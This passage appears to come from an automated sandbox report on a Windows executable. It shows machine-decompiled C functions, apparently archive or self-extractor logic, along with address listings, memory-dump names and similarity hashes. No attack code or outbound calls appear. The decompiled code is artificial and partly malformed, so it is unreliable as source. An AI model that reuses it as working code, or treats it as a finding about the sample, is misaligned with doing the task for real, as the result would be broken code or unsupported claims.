							if( *((char*)(_t154 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t154 + 0x1d)) - 0x53;
							if( *((char*)(_t154 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t154 + 0x1e)) - 0x46;
							if( *((char*)(_t154 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t154 + 0x1f)) - 0x58;
							if( *((char*)(_t154 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t196 = _t196 + 1;
							__eflags = _t196 - _t110;
						} while (_t196 < _t110);
						goto L22;
					} else {
						 *(_t192 + 0x6cb0) = _t106;
						__eflags = _t106 - 1;
						if(_t106 == 1) {
							_t200 =  *_t192;
							_t155 =  *((intOrPtr*)(_t200 + 0x14))(0);
							asm("sbb edx, ebx");
							 *((intOrPtr*)(_t200 + 0x10))(_t155 - 7, __edx);
						}
						L25:
						_t112 =  *(_t192 + 0x6cb0);
						__eflags = _t112 - 4;
						if(__eflags != 0) {
							__eflags = _t112 - 3;
							if(_t112 != 3) {
								 *((intOrPtr*)(_t192 + 0x2200)) = 7;
								L32:
								 *((char*)(_t201 - 0xd)) = _t159;
								_t113 = E00833A2C(_t192, _t190);
								__eflags = _t113;
								_t114 = _t113 & 0xffffff00 | _t113 != 0x00000000;
								 *(_t201 - 0xe) = _t114;
								__eflags = _t114 - 1;
								if(_t114 != 1) {
									L38:
									_t115 =  *((intOrPtr*)(_t201 - 0xd));
									L39:
									_t171 =  *((intOrPtr*)(_t192 + 0x6cc5));
									__eflags = _t171;
									if(_t171 == 0) {
										L41:
										__eflags =  *((char*)(_t192 + 0x6cc4));
										if( *((char*)(_t192 + 0x6cc4)) != 0) {
											L43:
											__eflags = _t171;
											if(__eflags == 0) {
												E00836D22(__eflags, 0x1b, _t192 + 0x1e);
											}
											__eflags =  *((char*)(_t201 + 8));
											if( *((char*)(_t201 + 8)) == 0) {
												goto L1;
											} else {
												L46:
												__eflags =  *(_t201 - 0xe);
												 *((char*)(_t192 + 0x6cb6)) =  *((intOrPtr*)(_t192 + 0x2224));
												if( *(_t201 - 0xe) == 0) {
													L67:
													__eflags =  *((char*)(_t192 + 0x6cb5));
													if( *((char*)(_t192 + 0x6cb5)) == 0) {
														L69:
														E0083FAE7(_t192 + 0x6cfa, _t192 + 0x1e, 0x800);
														L70:
														_t116 = 1;
														L71:
														 *[fs:0x0] =  *((intOrPtr*)(_t201 - 0xc));
														return _t116;
													}
													__eflags =  *((char*)(_t192 + 0x6cb9));
													if( *((char*)(_t192 + 0x6cb9)) == 0) {
														goto L70;
													}
													goto L69;
												}
												__eflags =  *((char*)(_t192 + 0x21e0));
												if( *((char*)(_t192 + 0x21e0)) == 0) {
													L49:
													 *((intOrPtr*)(_t201 - 0x2c)) = _t192;
													 *((intOrPtr*)(_t201 - 0x24)) =  *((intOrPtr*)( *_t192 + 0x14))();
													 *((intOrPtr*)(_t201 - 0x20)) = _t190;
													_t198 =  *((intOrPtr*)(_t192 + 0x6ca0));
													 *((intOrPtr*)(_t201 + 8)) =  *((intOrPtr*)(_t192 + 0x6ca4));
													 *((intOrPtr*)(_t201 - 0x18)) =  *((intOrPtr*)(_t192 + 0x6ca8));
													 *(_t201 - 0x14) =  *(_t192 + 0x6cac);
													 *(_t201 - 4) = 1;
													 *((intOrPtr*)(_t201 - 0x1c)) =  *((intOrPtr*)(_t192 + 0x21dc));
													while(1) {
														_t125 = E00833A2C(_t192, _t190);
														__eflags = _t125;
														if(_t125 == 0) {
															break;
														}
														_t126 =  *((intOrPtr*)(_t192 + 0x21dc));
														__eflags = _t126 - 3;
														if(_t126 != 3) {
															__eflags = _t126 - 2;
															if(_t126 == 2) {
																__eflags =  *((char*)(_t192 + 0x6cb5));
																if( *((char*)(_t192 + 0x6cb5)) != 0) {
																	__eflags =  *((char*)(_t192 + 0x3318));
																	if( *((char*)(_t192 + 0x3318)) == 0) {
																		_t159 = 1;
																		__eflags = 1;
																	}
																}
																 *((char*)(_t192 + 0x6cb9)) = _t159;
																L66:
																_t87 = _t201 - 4;
																 *_t87 =  *(_t201 - 4) | 0xffffffff;
																__eflags =  *_t87;
																 *((intOrPtr*)(_t192 + 0x6ca4)) =  *((intOrPtr*)(_t201 + 8));
																 *((intOrPtr*)(_t192 + 0x6ca8)) =  *((intOrPtr*)(_t201 - 0x18));
																 *(_t192 + 0x6cac) =  *(_t201 - 0x14);
																 *((intOrPtr*)(_t192 + 0x6ca0)) = _t198;
																 *((intOrPtr*)(_t192 + 0x21dc)) =  *((intOrPtr*)(_t201 - 0x1c));
																E0083168F(_t201 - 0x2c); // executed
																goto L67;
															}
															__eflags = _t126 - 5;
															if(_t126 == 5) {
																goto L66;
															}
															L59:
															E00831E8B(_t192);
															continue;
														}
														__eflags =  *((char*)(_t192 + 0x6cb5));
														if( *((char*)(_t192 + 0x6cb5)) == 0) {
															L55:
															_t133 = _t159;
															L56:
															 *((char*)(_t192 + 0x6cb9)) = _t133;
															goto L59;
														}
														__eflags =  *((char*)(_t192 + 0x5668));
														if( *((char*)(_t192 + 0x5668)) != 0) {
															goto L55;
														}
														_t133 = 1;
														goto L56;
													}
													goto L66;
												}
												__eflags =  *((char*)(_t192 + 0x6cbc));
												if( *((char*)(_t192 + 0x6cbc)) != 0) {
													goto L67;
												}
												goto L49;
											}
										}
										__eflags = _t115;
										if(_t115 != 0) {
											goto L46;
										}
										goto L43;
									}
									__eflags =  *((char*)(_t201 + 8));
									if( *((char*)(_t201 + 8)) == 0) {
										goto L1;
									}
									goto L41;
								}
								 *((char*)(_t201 - 0xd)) = _t159;
								while(1) {
									E00831E8B(_t192);
									_t138 =  *((intOrPtr*)(_t192 + 0x21dc));
									__eflags = _t138 - 1;
									if(_t138 == 1) {
										break;
									}
									__eflags =  *((char*)(_t192 + 0x21e0));
									if( *((char*)(_t192 + 0x21e0)) == 0) {
										L37:
										_t139 = E00833A2C(_t192, _t190);
										__eflags = _t139;
										_t140 = _t139 & 0xffffff00 | _t139 != 0x00000000;
										 *(_t201 - 0xe) = _t140;
										__eflags = _t140 - 1;
										if(_t140 == 1) {
											continue;
										}
										goto L38;
									}
									__eflags = _t138 - 4;
									if(_t138 == 4) {
										break;
									}
									goto L37;
								}
								_t115 = 1;
								goto L39;
							}
							_t199 = _t192 + 0x21ff;
							_t142 =  *((intOrPtr*)( *_t192 + 0xc))(_t199, 1);
							__eflags = _t142 - 1;
							if(_t142 != 1) {
								goto L1;
							}
							__eflags =  *_t199;
							if( *_t199 != 0) {
								goto L1;
							}
							 *((intOrPtr*)(_t192 + 0x2200)) = 8;
							goto L32;
						}
						E00836D22(__eflags, 0x3c, _t192 + 0x1e);
						goto L1;
					}
				}
				L1:
				_t116 = 0;
				goto L71;
			}

0x008319c1
0x008319c6
0x008319d1
0x008319d3
0x008319d5
0x008319d9
0x008319df
0x008319e0
0x008319e6
0x008319f2
0x008319fe
0x00831a04
0x00831a09
0x00831a0b
0x00831a3d
0x00831a46
0x00831a49
0x00831a4f
0x00831a5a
0x00831a5d
0x00831a60
0x00831a62
0x00831a64
0x00831a67
0x00831a69
0x00831afd
0x00831afd
0x00831b00
0x00831b06
0x00831b12
0x00831b12
0x00831b12
0x00831b16
0x00000000
0x00831b16
0x00831b08
0x00000000
0x00000000
0x00000000
0x00000000
0x00831a6f
0x00831a6f
0x00831a72
0x00831a74
0x00831a77
0x00000000
0x00000000
0x00831a7d
0x00831a82
0x00831a84
0x00831ac0
0x00831ac0
0x00000000
0x00831ac0
0x00831a86
0x00831a89
0x00831a8f
0x00831a92
0x00831aca
0x00831aca
0x00831acc
0x00831ad4
0x00831ada
0x00831add
0x00831ae3
0x00831ae6
0x00831aed
0x00831afa
0x00000000
0x00831afa
0x00831ae8
0x00831aeb
0x00000000
0x00000000
0x00000000
0x00831aeb
0x00831a94
0x00831a96
0x00000000
0x00000000
0x00831a98
0x00831a9b
0x00000000
0x00000000
0x00831a9d
0x00831aa1
0x00000000
0x00000000
0x00831aa6
0x00831aa8
0x00831aac
0x00000000
0x00000000
0x00831aae
0x00831ab2
0x00000000
0x00000000
0x00831ab4
0x00831ab8
0x00000000
0x00000000
0x00831aba
0x00831abe
0x00000000
0x00000000
0x00000000
0x00831ac3
0x00831ac3
0x00831ac4
0x00831ac4
0x00000000
0x00831a0d
0x00831a0d
0x00831a13
0x00831a16
0x00831a1c
0x00831a21
0x00831a29
0x00831a2d
0x00831a2d
0x00831b1b
0x00831b1b
0x00831b21
0x00831b24
0x00831b36
0x00831b39
0x00831b69
0x00831b73
0x00831b75
0x00831b78
0x00831b7d
0x00831b7f
0x00831b82
0x00831b85
0x00831b87
0x00831bc7
0x00831bc7
0x00831bca
0x00831bca
0x00831bd0
0x00831bd2
0x00831bde
0x00831bde
0x00831be5
0x00831beb
0x00831beb
0x00831bed
0x00831bf5
0x00831bf5
0x00831bfa
0x00831bfe
0x00000000
0x00831c04
0x00831c04
0x00831c04
0x00831c0e
0x00831c14
0x00831d15
0x00831d15
0x00831d1c
0x00831d27
0x00831d37
0x00831d3c
0x00831d3c
0x00831d3e
0x00831d44
0x00831d4e
0x00831d4e
0x00831d1e
0x00831d25
0x00000000
0x00000000
0x00000000
0x00831d25
0x00831c1a
0x00831c21
0x00831c30
0x00831c34
0x00831c3a
0x00831c3d
0x00831c46
0x00831c4c
0x00831c55
0x00831c5e
0x00831c67
0x00831c6e
0x00831cb7
0x00831cb9
0x00831cbe
0x00831cc0
0x00000000
0x00000000
0x00831c7a
0x00831c80
0x00831c83
0x00831ca6
0x00831ca9
0x00831cc4
0x00831ccb
0x00831ccd
0x00831cd4
0x00831cd8
0x00831cd8
0x00831cd8
0x00831cd4
0x00831cd9
0x00831cdf
0x00831ce5
0x00831ce5
0x00831ce5
0x00831ce9
0x00831cf2
0x00831cfb
0x00831d04
0x00831d0a
0x00831d10
0x00000000
0x00831d10
0x00831cab
0x00831cae
0x00000000
0x00000000
0x00831cb0
0x00831cb2
0x00000000
0x00831cb2
0x00831c85
0x00831c8c
0x00831c9c
0x00831c9c
0x00831c9e
0x00831c9e
0x00000000
0x00831c9e
0x00831c8e
0x00831c95
0x00000000
0x00000000
0x00831c99
0x00000000
0x00831c99
0x00000000
0x00831cc2
0x00831c23
0x00831c2a
0x00000000
0x00000000
0x00000000
0x00831c2a
0x00831bfe
0x00831be7
0x00831be9
0x00000000
0x00000000
0x00000000
0x00831be9
0x00831bd4
0x00831bd8
0x00000000
0x00000000
0x00000000
0x00831bd8
0x00831b89
0x00831b8c
0x00831b8e
0x00831b93
0x00831b99
0x00831b9c
0x00000000
0x00000000
0x00831ba2
0x00831ba9
0x00831bb4
0x00831bb6
0x00831bbb
0x00831bbd
0x00831bc0
0x00831bc3
0x00831bc5
0x00000000
0x00000000
0x00000000
0x00831bc5
0x00831bab
0x00831bae
0x00000000
0x00000000
0x00000000
0x00831bae
0x00831c73
0x00000000
0x00831c73
0x00831b3d
0x00831b48
0x00831b4b
0x00831b4e
0x00000000
0x00000000
0x00831b54
0x00831b57
0x00000000
0x00000000
0x00831b5d
0x00000000
0x00831b5d
0x00831b2c
0x00000000
0x00831b2c
0x00831a0b
0x008319f4
0x008319f4
0x00000000

APIs

__EH_prolog.LIBCMT ref: 008319C6

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8b38522294903ccd3d0ca301d0f16719a14e2a774e4708824bca31c353132f97
Instruction ID: f9a8ff2e246b6649db0619e7a566e5f760b05c1461e994258e896da4b1470c76
Opcode Fuzzy Hash: 8b38522294903ccd3d0ca301d0f16719a14e2a774e4708824bca31c353132f97
Instruction Fuzzy Hash: 24B1EE70A04646AFEF28CF78C488BB9FBA5FF81714F144259E465D3281CB71A960CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0083825A, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0083825A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t80;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				E0084D8C4(E00861356, __ecx);
				E0084D9C0();
				_t93 = __ecx;
				_t1 = _t95 - 0x9d58; // -38232
				E0083136E(_t1, __edx, __edi, _t98,  *((intOrPtr*)(__ecx + 8)));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E00839CB2(_t6, __ecx + 0xf4) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E008319C1(_t7, __edx, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if(__eflags != 0) {
								_t10 = _t95 - 0x9d3a; // -38202
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E0083FAE7(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E0083B81F(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E00836FEC(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									__eflags = E0083A255(_t18, _t88, __eflags, _t20, _t19);
									if(__eflags == 0) {
										break;
									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E008383F2(_t93, _t88, _t95, __eflags, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x61f9)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x61f9));
								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
								E00840FE5((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
							}
							_t33 = _t95 - 0x9d58; // -38232, executed
							E00831E9F(_t33, _t89, _t93);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E00833A2C(_t34, _t89);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E00838458(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E00836F18(0x8700e0, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E0083161E(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}

0x0083825a
0x0083825a
0x0083825a
0x0083825f
0x00838269
0x0083826f
0x00838271
0x0083827a
0x0083827f
0x0083828a
0x00838297
0x0083829f
0x008382a5
0x008382ac
0x008382bf
0x008382c6
0x008382cd
0x008382d0
0x008382d2
0x008382d8
0x008382df
0x008382e6
0x008382ed
0x008382f2
0x0083830d
0x00838319
0x00838320
0x00838325
0x0083832b
0x00838330
0x00838332
0x00838339
0x00838345
0x00838347
0x00000000
0x00000000
0x008382fa
0x00838300
0x00838306
0x00838306
0x00838349
0x0083834f
0x0083834f
0x00838355
0x0083835e
0x00838363
0x00838368
0x00838369
0x0083836a
0x00838372
0x00838375
0x0083837c
0x0083837c
0x00838377
0x00838377
0x0083837a
0x00000000
0x00000000
0x0083837a
0x00838383
0x00838386
0x0083838d
0x0083838f
0x0083839d
0x0083839d
0x008383a4
0x008383a4
0x008383a9
0x008383af
0x008383b4
0x008383b4
0x008383ba
0x008383bf
0x008383c4
0x008383cd
0x008383d2
0x008383d2
0x008383b4
0x008382ae
0x008382b5
0x008382b5
0x008382ac
0x008383d6
0x008383dc
0x008383e7
0x008383f1

APIs

__EH_prolog.LIBCMT ref: 0083825F

Part of subcall function 0083136E: __EH_prolog.LIBCMT ref: 00831373
Part of subcall function 0083136E: new.LIBCMT ref: 008313EB

Part of subcall function 008319C1: __EH_prolog.LIBCMT ref: 008319C6

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3c3568485cb60c42a7107978a6dc7d6ca309b4fb2443aa5cf705446bf6bc2f32
Instruction ID: 8838d67d396e04f86bfe3c05f57ac9e0af96bd27470d147de4a4f1f38d784143
Opcode Fuzzy Hash: 3c3568485cb60c42a7107978a6dc7d6ca309b4fb2443aa5cf705446bf6bc2f32
Instruction Fuzzy Hash: 6741B3719006589ADB20EB64C855BEAB7A8FF90704F0404EAF58AD3242EF745EC8DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00842AF2, Relevance: 1.6, APIs: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00842AF2(void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				void* _t29;
				signed int _t30;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t29 = E0084D8C4(E00861514, __ecx);
				_push(__ecx);
				_push(__ecx);
				_t60 = __ecx;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(__ecx + 0x20));
				if( *((intOrPtr*)(__ecx + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E0084DB5F(__ecx, __edx, 0x400400, _t72); // executed
					 *((intOrPtr*)(__ecx + 0x20)) = _t42;
					_t29 = E0084E920(__ecx, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_t58 = _t30 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004); // executed
					_t36 = E0084DB5F(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73); // executed
					_pop(0x8700e0);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E008417FB);
						_push(E00841639);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E0084D9ED(_t58, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E0084E920(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00852BB3(0x8700e0); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0x8700e0 = 0x30c00;
								if(_t39 == 0) {
									E00836E54(0x8700e0);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}

0x00842af7
0x00842afc
0x00842afd
0x00842b01
0x00842b03
0x00842b05
0x00842b08
0x00842b0f
0x00842b10
0x00842b18
0x00842b1b
0x00842b20
0x00842b20
0x00842b23
0x00842b26
0x00842b31
0x00842b38
0x00842b3a
0x00842b3d
0x00842b52
0x00842b53
0x00842b58
0x00842b59
0x00842b5c
0x00842b5f
0x00842b61
0x00842b63
0x00842b68
0x00842b6d
0x00842b6e
0x00842b6e
0x00842b71
0x00842b73
0x00842b78
0x00842b79
0x00842b79
0x00842b7e
0x00842b88
0x00842b8f
0x00842b99
0x00842b9b
0x00842b9d
0x00842ba0
0x00842ba3
0x00842bac
0x00842bb3
0x00842bbd
0x00842bc2
0x00842bc8
0x00842bcb
0x00842bd2
0x00842bd2
0x00842bd7
0x00842bd7
0x00842bda
0x00842bdf
0x00842be2
0x00842be2
0x00842ba0
0x00842b99
0x00842bed
0x00842bf7

APIs

__EH_prolog.LIBCMT ref: 00842AF7

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 853c8e26e4e0a58f5ec66e74212c54c550f7ae0104484af9818c9bdef84d07fb
Instruction ID: 463e1edea1b0cf9a7299883d8888da22904bd367b7805a3224fceda5c244518c
Opcode Fuzzy Hash: 853c8e26e4e0a58f5ec66e74212c54c550f7ae0104484af9818c9bdef84d07fb
Instruction Fuzzy Hash: B421E6B1E40219ABDB049F78CC45B6ABB68FB14324F04063AF909EB681D7749940C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00849F62, Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00849F62(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				short _t55;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				E0084D8C4(E0086156F, __ecx);
				_push(__ecx);
				E0084D9C0();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E0083136E(_t62 - 0x7d24, __edx, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E00831EEE(_t62 - 0x7d24, __edx, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_push(_t62 - 0x24);
					_t50 = _t62 - 0x7d24;
					_t33 = E00831906(_t62 - 0x7d24, _t57, _t60); // executed
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E00852BB3(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E0084EA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E008315D4(_t62 - 0x24);
					E0083161E(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E0083161E(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}

0x00849f62
0x00849f62
0x00849f67
0x00849f6c
0x00849f72
0x00849f78
0x00849f79
0x00849f7c
0x00849f86
0x00849f89
0x00849f97
0x00849f9b
0x00849fa6
0x00849fb7
0x00849fba
0x00849fbd
0x00849fc0
0x00849fc3
0x00849fc9
0x00849fcd
0x00849fce
0x00849fd4
0x00849fd9
0x00849fdb
0x00849fdd
0x00849fe0
0x00849fe6
0x00849fed
0x00849ff2
0x00849ff4
0x00849ff6
0x00849ffc
0x00849fff
0x0084a007
0x00849ff8
0x00849ff8
0x00849ff8
0x0084a012
0x0084a012
0x0084a017
0x0084a022
0x0084a027
0x00849fa8
0x00849fae
0x00849fb3
0x00849fb3
0x0084a02e
0x0084a039

APIs

__EH_prolog.LIBCMT ref: 00849F67

Part of subcall function 0083136E: __EH_prolog.LIBCMT ref: 00831373
Part of subcall function 0083136E: new.LIBCMT ref: 008313EB

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 60c44a1206e74affe3abfe3c2430e705d3d406a378c0cf508604876b7e1eca6c
Instruction ID: b35393114f33184fbbbe5f61218c0e81cf3445aed56914540017d32d1156290f
Opcode Fuzzy Hash: 60c44a1206e74affe3abfe3c2430e705d3d406a378c0cf508604876b7e1eca6c
Instruction Fuzzy Hash: 60216D71D0425DDACF14DF98D9815EEBBB4FF59304F0004AAE809E7202DB356E05DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 008391A3, Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E008391A3(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t41;
				void* _t43;
				void* _t50;

				_t36 = __edx;
				E0084D8C4(E008613A5, __ecx);
				E0083134C(_t43 - 0x20, E00837CD8());
				_push( *((intOrPtr*)(_t43 - 0x1c)));
				_push( *((intOrPtr*)(_t43 - 0x20)));
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t41 = E0083C7AC();
				if(_t41 > 0) {
					_t27 =  *((intOrPtr*)(_t43 + 0x10));
					_t38 =  *((intOrPtr*)(_t43 + 0xc));
					do {
						_t22 = _t41;
						asm("cdq");
						_t50 = _t36 - _t27;
						if(_t50 > 0 || _t50 >= 0 && _t22 >= _t38) {
							_t41 = _t38;
						}
						if(_t41 > 0) {
							E0083C964( *((intOrPtr*)(_t43 + 8)), _t43,  *((intOrPtr*)(_t43 - 0x20)), _t41);
							asm("cdq");
							_t38 = _t38 - _t41;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t43 - 0x1c)));
						_push( *((intOrPtr*)(_t43 - 0x20)));
						_t41 = E0083C7AC();
					} while (_t41 > 0);
				}
				_t21 = E0083158D(_t43 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t21;
			}

0x008391a3
0x008391a8
0x008391ba
0x008391bf
0x008391c5
0x008391c8
0x008391d1
0x008391d5
0x008391d8
0x008391dc
0x008391df
0x008391df
0x008391e1
0x008391e2
